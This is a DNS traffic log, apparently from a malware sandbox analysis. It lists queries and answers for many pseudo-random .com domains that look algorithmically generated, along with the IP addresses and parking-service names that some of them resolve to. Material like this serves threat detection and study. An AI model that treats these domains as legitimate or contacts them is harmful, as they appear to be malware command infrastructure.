Aug 23, 2024 18:48:58.396183968 CEST	192.168.2.4	1.1.1.1	0x7ab	Standard query (0)	volyqat.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.396503925 CEST	192.168.2.4	1.1.1.1	0x1750	Standard query (0)	qedyfyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.396709919 CEST	192.168.2.4	1.1.1.1	0x8ef2	Standard query (0)	pumyxiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.396785021 CEST	192.168.2.4	1.1.1.1	0x33ef	Standard query (0)	galyqaz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.396939039 CEST	192.168.2.4	1.1.1.1	0xe05d	Standard query (0)	lysyfyj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.397111893 CEST	192.168.2.4	1.1.1.1	0xebd8	Standard query (0)	qekyqop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.397212029 CEST	192.168.2.4	1.1.1.1	0xc813	Standard query (0)	vonyzuf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.397265911 CEST	192.168.2.4	1.1.1.1	0xcf2	Standard query (0)	volybak.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.397413969 CEST	192.168.2.4	1.1.1.1	0xbcfa	Standard query (0)	puvygyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.397499084 CEST	192.168.2.4	1.1.1.1	0xdb0	Standard query (0)	vojycit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.397638083 CEST	192.168.2.4	1.1.1.1	0xc266	Standard query (0)	gahyqah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.397809029 CEST	192.168.2.4	1.1.1.1	0xaf4f	Standard query (0)	qetyfuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.398241997 CEST	192.168.2.4	1.1.1.1	0x2e18	Standard query (0)	vocyzit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.398794889 CEST	192.168.2.4	1.1.1.1	0xbe70	Standard query (0)	vojyqem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.400311947 CEST	192.168.2.4	1.1.1.1	0x70d1	Standard query (0)	gadyniw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.402174950 CEST	192.168.2.4	1.1.1.1	0xd160	Standard query (0)	lyvyxor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.404745102 CEST	192.168.2.4	1.1.1.1	0x5128	Standard query (0)	puzylyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.406524897 CEST	192.168.2.4	1.1.1.1	0x5ece	Standard query (0)	vonypom.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.456187963 CEST	192.168.2.4	1.1.1.1	0xd220	Standard query (0)	qegyhig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.464576006 CEST	192.168.2.4	1.1.1.1	0xe0fd	Standard query (0)	lysyfyj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.545851946 CEST	192.168.2.4	1.1.1.1	0x19a3	Standard query (0)	galyqaz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.557746887 CEST	192.168.2.4	1.1.1.1	0xa02f	Standard query (0)	gatyfus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.634027958 CEST	192.168.2.4	1.1.1.1	0x64a3	Standard query (0)	lymyxid.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:59.324592113 CEST	192.168.2.4	1.1.1.1	0x40c2	Standard query (0)	www.gahyqah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:59.388036966 CEST	192.168.2.4	1.1.1.1	0x70d1	Standard query (0)	gadyniw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.292578936 CEST	192.168.2.4	1.1.1.1	0xb898	Standard query (0)	pupydeq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.293339014 CEST	192.168.2.4	1.1.1.1	0x38c7	Standard query (0)	ganyzub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.293385029 CEST	192.168.2.4	1.1.1.1	0xfed	Standard query (0)	lykymox.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.293971062 CEST	192.168.2.4	1.1.1.1	0x3dd5	Standard query (0)	qebylug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.293971062 CEST	192.168.2.4	1.1.1.1	0x1aba	Standard query (0)	vopydek.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.294676065 CEST	192.168.2.4	1.1.1.1	0x6425	Standard query (0)	pujymip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.295011044 CEST	192.168.2.4	1.1.1.1	0x2b53	Standard query (0)	gatydaw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.295671940 CEST	192.168.2.4	1.1.1.1	0xfe34	Standard query (0)	lyvylyn.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.296260118 CEST	192.168.2.4	1.1.1.1	0x96f2	Standard query (0)	vojymic.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.296848059 CEST	192.168.2.4	1.1.1.1	0x7154	Standard query (0)	qetysal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.297442913 CEST	192.168.2.4	1.1.1.1	0xc46a	Standard query (0)	puvylyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.298099995 CEST	192.168.2.4	1.1.1.1	0xf53e	Standard query (0)	gahynus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.298651934 CEST	192.168.2.4	1.1.1.1	0x8521	Standard query (0)	lyrysor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.299210072 CEST	192.168.2.4	1.1.1.1	0x98c9	Standard query (0)	vocykem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.299808025 CEST	192.168.2.4	1.1.1.1	0x7691	Standard query (0)	qegynuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.300384998 CEST	192.168.2.4	1.1.1.1	0xd76e	Standard query (0)	purypol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.300954103 CEST	192.168.2.4	1.1.1.1	0x29c4	Standard query (0)	gacykeh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.301500082 CEST	192.168.2.4	1.1.1.1	0x39e3	Standard query (0)	lygynud.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.302083015 CEST	192.168.2.4	1.1.1.1	0xc375	Standard query (0)	vowypit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.302737951 CEST	192.168.2.4	1.1.1.1	0x9a8b	Standard query (0)	qexykaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.303232908 CEST	192.168.2.4	1.1.1.1	0xd1f0	Standard query (0)	pufybyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.303584099 CEST	192.168.2.4	1.1.1.1	0xcab4	Standard query (0)	lyxyjaj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.303690910 CEST	192.168.2.4	1.1.1.1	0x6cbb	Standard query (0)	vofybyf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.304171085 CEST	192.168.2.4	1.1.1.1	0x2832	Standard query (0)	gaqypiz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.304389000 CEST	192.168.2.4	1.1.1.1	0xb9b7	Standard query (0)	qeqytup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.304903984 CEST	192.168.2.4	1.1.1.1	0xb349	Standard query (0)	puzyjoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.305392027 CEST	192.168.2.4	1.1.1.1	0x37e6	Standard query (0)	gadyveb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.305891991 CEST	192.168.2.4	1.1.1.1	0x8f49	Standard query (0)	lymytux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.306343079 CEST	192.168.2.4	1.1.1.1	0x8432	Standard query (0)	volyjok.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.306777954 CEST	192.168.2.4	1.1.1.1	0xa1da	Standard query (0)	qedyveg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.307290077 CEST	192.168.2.4	1.1.1.1	0xf7fa	Standard query (0)	pumytup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.307761908 CEST	192.168.2.4	1.1.1.1	0x7426	Standard query (0)	galyhiw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.308258057 CEST	192.168.2.4	1.1.1.1	0xc0f2	Standard query (0)	lysyvan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.308737040 CEST	192.168.2.4	1.1.1.1	0x4847	Standard query (0)	vonyryc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.309158087 CEST	192.168.2.4	1.1.1.1	0xdf6c	Standard query (0)	qekyhil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.309710979 CEST	192.168.2.4	1.1.1.1	0xd923	Standard query (0)	pupycag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.310223103 CEST	192.168.2.4	1.1.1.1	0xba52	Standard query (0)	ganyrys.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.310722113 CEST	192.168.2.4	1.1.1.1	0xa376	Standard query (0)	lykygur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.311157942 CEST	192.168.2.4	1.1.1.1	0x5cd7	Standard query (0)	vopycom.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.311661959 CEST	192.168.2.4	1.1.1.1	0xa207	Standard query (0)	qebyrev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.312134027 CEST	192.168.2.4	1.1.1.1	0x1663	Standard query (0)	pujygul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.312629938 CEST	192.168.2.4	1.1.1.1	0x795f	Standard query (0)	gatycoh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.313049078 CEST	192.168.2.4	1.1.1.1	0x8d4c	Standard query (0)	lyvywed.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.313491106 CEST	192.168.2.4	1.1.1.1	0x1380	Standard query (0)	vojygut.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.313987970 CEST	192.168.2.4	1.1.1.1	0x617f	Standard query (0)	qetyxiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.314469099 CEST	192.168.2.4	1.1.1.1	0x6bf2	Standard query (0)	puvywav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.315025091 CEST	192.168.2.4	1.1.1.1	0x3c05	Standard query (0)	gahyfyz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.315846920 CEST	192.168.2.4	1.1.1.1	0x612e	Standard query (0)	lyryxij.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.315887928 CEST	192.168.2.4	1.1.1.1	0x792f	Standard query (0)	vocyqaf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.316608906 CEST	192.168.2.4	1.1.1.1	0x8ec8	Standard query (0)	qegyfyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.316838980 CEST	192.168.2.4	1.1.1.1	0x8bd8	Standard query (0)	puryxuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.317074060 CEST	192.168.2.4	1.1.1.1	0xf988	Standard query (0)	lygyfex.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.317723036 CEST	192.168.2.4	1.1.1.1	0xd9e1	Standard query (0)	gacyqob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.318325043 CEST	192.168.2.4	1.1.1.1	0x6e16	Standard query (0)	vowyzuk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.319879055 CEST	192.168.2.4	1.1.1.1	0x5bed	Standard query (0)	qexyqog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.320058107 CEST	192.168.2.4	1.1.1.1	0xddb0	Standard query (0)	pufydep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.320266962 CEST	192.168.2.4	1.1.1.1	0xb5cf	Standard query (0)	gaqyzuw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.320403099 CEST	192.168.2.4	1.1.1.1	0xed7a	Standard query (0)	lyxymin.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.320579052 CEST	192.168.2.4	1.1.1.1	0xd3b3	Standard query (0)	vofydac.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.320715904 CEST	192.168.2.4	1.1.1.1	0x2b10	Standard query (0)	qeqylyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.320858955 CEST	192.168.2.4	1.1.1.1	0x26a3	Standard query (0)	puzymig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.321003914 CEST	192.168.2.4	1.1.1.1	0x3e00	Standard query (0)	gadydas.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.321187973 CEST	192.168.2.4	1.1.1.1	0xd070	Standard query (0)	lymylyr.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.321337938 CEST	192.168.2.4	1.1.1.1	0x6867	Standard query (0)	volymum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.362685919 CEST	192.168.2.4	1.1.1.1	0x4e75	Standard query (0)	lysyvan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.482508898 CEST	192.168.2.4	1.1.1.1	0x2601	Standard query (0)	pupycag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.499622107 CEST	192.168.2.4	1.1.1.1	0xbfc7	Standard query (0)	pupydeq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.904136896 CEST	192.168.2.4	1.1.1.1	0x24c8	Standard query (0)	lyrysor.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 23, 2024 18:47:00.273297071 CEST	1.1.1.1	192.168.2.4	0x226f	No error (0)	gahyqah.com		162.255.119.102	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.273297071 CEST	1.1.1.1	192.168.2.4	0x226f	No error (0)	gahyqah.com		23.253.46.64	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.289416075 CEST	1.1.1.1	192.168.2.4	0x45da	Name error (3)	puvyxil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.423805952 CEST	1.1.1.1	192.168.2.4	0x136a	Name error (3)	lyryfyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.468940020 CEST	1.1.1.1	192.168.2.4	0x4114	Name error (3)	qegyqaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.474263906 CEST	1.1.1.1	192.168.2.4	0x8281	No error (0)	qetyfuv.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.480525970 CEST	1.1.1.1	192.168.2.4	0x8a6	No error (0)	lyvyxor.com		208.100.26.245	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.507891893 CEST	1.1.1.1	192.168.2.4	0x3911	Name error (3)	purydyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.590188980 CEST	1.1.1.1	192.168.2.4	0x797	Name error (3)	vofymik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.591567039 CEST	1.1.1.1	192.168.2.4	0x7e89	Name error (3)	gaqydeb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.591578007 CEST	1.1.1.1	192.168.2.4	0xa038	Name error (3)	gacyzuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.593434095 CEST	1.1.1.1	192.168.2.4	0x57b2	Name error (3)	lygymoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.593446016 CEST	1.1.1.1	192.168.2.4	0x1bf2	Name error (3)	qexylup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.593455076 CEST	1.1.1.1	192.168.2.4	0x9b7c	Name error (3)	qeqysag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.600111008 CEST	1.1.1.1	192.168.2.4	0x1357	Name error (3)	vojyjof.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.602751017 CEST	1.1.1.1	192.168.2.4	0xa0f6	Name error (3)	pujyjav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.602935076 CEST	1.1.1.1	192.168.2.4	0x1584	Name error (3)	lyvytuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.602945089 CEST	1.1.1.1	192.168.2.4	0x234d	Name error (3)	galykes.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.602957010 CEST	1.1.1.1	192.168.2.4	0x6be9	Name error (3)	qedynul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.602967024 CEST	1.1.1.1	192.168.2.4	0xb36e	Name error (3)	volykyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.602976084 CEST	1.1.1.1	192.168.2.4	0x90de	Name error (3)	lykyjad.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.603485107 CEST	1.1.1.1	192.168.2.4	0x3e79	Name error (3)	puvytuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.603494883 CEST	1.1.1.1	192.168.2.4	0x1747	Name error (3)	qetyvep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.603502989 CEST	1.1.1.1	192.168.2.4	0xb8a7	Name error (3)	pumypog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.608244896 CEST	1.1.1.1	192.168.2.4	0x5dd7	Name error (3)	gacyryw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.609455109 CEST	1.1.1.1	192.168.2.4	0xb4d1	Name error (3)	purycap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.610599995 CEST	1.1.1.1	192.168.2.4	0x3b6b	Name error (3)	gahyhob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.610610962 CEST	1.1.1.1	192.168.2.4	0xedc7	Name error (3)	lygygin.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.613111973 CEST	1.1.1.1	192.168.2.4	0x657c	No error (0)	vocyzit.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.613123894 CEST	1.1.1.1	192.168.2.4	0xe940	Name error (3)	vowycac.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.614985943 CEST	1.1.1.1	192.168.2.4	0x9cf7	No error (0)	qegyhig.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.614985943 CEST	1.1.1.1	192.168.2.4	0x9cf7	No error (0)	qegyhig.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.615528107 CEST	1.1.1.1	192.168.2.4	0x99c1	Name error (3)	qexyryl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.617325068 CEST	1.1.1.1	192.168.2.4	0xf577	Name error (3)	vowydef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.617542982 CEST	1.1.1.1	192.168.2.4	0xd26d	Name error (3)	pufygug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.617554903 CEST	1.1.1.1	192.168.2.4	0xac6	Name error (3)	pufymoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.618308067 CEST	1.1.1.1	192.168.2.4	0x4333	Name error (3)	volyqat.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.618762970 CEST	1.1.1.1	192.168.2.4	0xd65b	Name error (3)	vonyzuf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.620656013 CEST	1.1.1.1	192.168.2.4	0x7823	Name error (3)	puzywel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.620666027 CEST	1.1.1.1	192.168.2.4	0xdb7f	Name error (3)	pumyxiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.620678902 CEST	1.1.1.1	192.168.2.4	0xa32f	Name error (3)	lyxylux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.621458054 CEST	1.1.1.1	192.168.2.4	0xc262	Name error (3)	pupybul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.621469021 CEST	1.1.1.1	192.168.2.4	0x40df	Name error (3)	qebytiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.621478081 CEST	1.1.1.1	192.168.2.4	0x232a	Name error (3)	lysynur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.621488094 CEST	1.1.1.1	192.168.2.4	0xbed0	Name error (3)	qekyqop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.621498108 CEST	1.1.1.1	192.168.2.4	0x4810	Name error (3)	qekykev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.621509075 CEST	1.1.1.1	192.168.2.4	0x7af4	Name error (3)	gatyvyz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.624515057 CEST	1.1.1.1	192.168.2.4	0x5c9a	Name error (3)	ganypih.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.625835896 CEST	1.1.1.1	192.168.2.4	0x34fd	Name error (3)	lyryvex.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.630354881 CEST	1.1.1.1	192.168.2.4	0xe237	Name error (3)	gaqycos.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.648852110 CEST	1.1.1.1	192.168.2.4	0x935	Name error (3)	vofygum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.649125099 CEST	1.1.1.1	192.168.2.4	0xd5df	Name error (3)	qedyfyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.649136066 CEST	1.1.1.1	192.168.2.4	0xf32b	Name error (3)	qeqyxov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.746706963 CEST	1.1.1.1	192.168.2.4	0xfd58	No error (0)	qegyhig.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.746706963 CEST	1.1.1.1	192.168.2.4	0xfd58	No error (0)	qegyhig.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.746782064 CEST	1.1.1.1	192.168.2.4	0xefc6	Name error (3)	lymysan.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.748327971 CEST	1.1.1.1	192.168.2.4	0x6671	No error (0)	puzylyp.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.759429932 CEST	1.1.1.1	192.168.2.4	0x436e	Name error (3)	vocyruk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.759536982 CEST	1.1.1.1	192.168.2.4	0xa1d9	Name error (3)	lyxywer.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.759552956 CEST	1.1.1.1	192.168.2.4	0x8c58	Name error (3)	vopybyt.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.776382923 CEST	1.1.1.1	192.168.2.4	0x409a	Name error (3)	gadyfuh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.801373005 CEST	1.1.1.1	192.168.2.4	0x5f09	No error (0)	galyqaz.com		199.191.50.83	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.817564964 CEST	1.1.1.1	192.168.2.4	0xaf97	No error (0)	gahyqah.com		162.255.119.102	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.817564964 CEST	1.1.1.1	192.168.2.4	0xaf97	No error (0)	gahyqah.com		23.253.46.64	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.823256016 CEST	1.1.1.1	192.168.2.4	0xc854	No error (0)	vonypom.com		18.208.156.248	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.834203005 CEST	1.1.1.1	192.168.2.4	0x2a8	No error (0)	gatyfus.com		85.17.31.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.834203005 CEST	1.1.1.1	192.168.2.4	0x2a8	No error (0)	gatyfus.com		85.17.31.122	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.834203005 CEST	1.1.1.1	192.168.2.4	0x2a8	No error (0)	gatyfus.com		178.162.203.202	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.834203005 CEST	1.1.1.1	192.168.2.4	0x2a8	No error (0)	gatyfus.com		178.162.203.211	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.834203005 CEST	1.1.1.1	192.168.2.4	0x2a8	No error (0)	gatyfus.com		178.162.203.226	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.834203005 CEST	1.1.1.1	192.168.2.4	0x2a8	No error (0)	gatyfus.com		178.162.217.107	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.834203005 CEST	1.1.1.1	192.168.2.4	0x2a8	No error (0)	gatyfus.com		5.79.71.205	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.834203005 CEST	1.1.1.1	192.168.2.4	0x2a8	No error (0)	gatyfus.com		5.79.71.225	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.846558094 CEST	1.1.1.1	192.168.2.4	0x8d7c	No error (0)	lysyfyj.com		69.162.80.60	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.915769100 CEST	1.1.1.1	192.168.2.4	0x8fb6	No error (0)	lyvyxor.com		208.100.26.245	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.949163914 CEST	1.1.1.1	192.168.2.4	0x4ead	No error (0)	qetyfuv.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.949697018 CEST	1.1.1.1	192.168.2.4	0x9600	No error (0)	puzylyp.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.949707985 CEST	1.1.1.1	192.168.2.4	0xe2c	No error (0)	galyqaz.com		199.191.50.83	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.953005075 CEST	1.1.1.1	192.168.2.4	0x3fa9	No error (0)	lymyxid.com		3.94.10.34	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.995863914 CEST	1.1.1.1	192.168.2.4	0x4eab	No error (0)	vocyzit.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:01.029037952 CEST	1.1.1.1	192.168.2.4	0x6eb6	No error (0)	vojyqem.com		172.234.222.143	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:01.029037952 CEST	1.1.1.1	192.168.2.4	0x6eb6	No error (0)	vojyqem.com		172.234.222.138	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:01.163475990 CEST	1.1.1.1	192.168.2.4	0xec36	No error (0)	vonypom.com		18.208.156.248	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:01.235857010 CEST	1.1.1.1	192.168.2.4	0x633e	No error (0)	lymyxid.com		3.94.10.34	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:01.347290993 CEST	1.1.1.1	192.168.2.4	0xbc1e	No error (0)	vojyqem.com		172.234.222.143	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:01.347290993 CEST	1.1.1.1	192.168.2.4	0xbc1e	No error (0)	vojyqem.com		172.234.222.138	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:01.641521931 CEST	1.1.1.1	192.168.2.4	0x227c	No error (0)	www.gahyqah.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:47:01.641521931 CEST	1.1.1.1	192.168.2.4	0x227c	No error (0)	parkingpage.namecheap.com		91.195.240.19	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:02.438819885 CEST	1.1.1.1	192.168.2.4	0x2d7c	No error (0)	ww3.galyqaz.com	sedoparking.com		CNAME (Canonical name)	IN (0x0001)	false
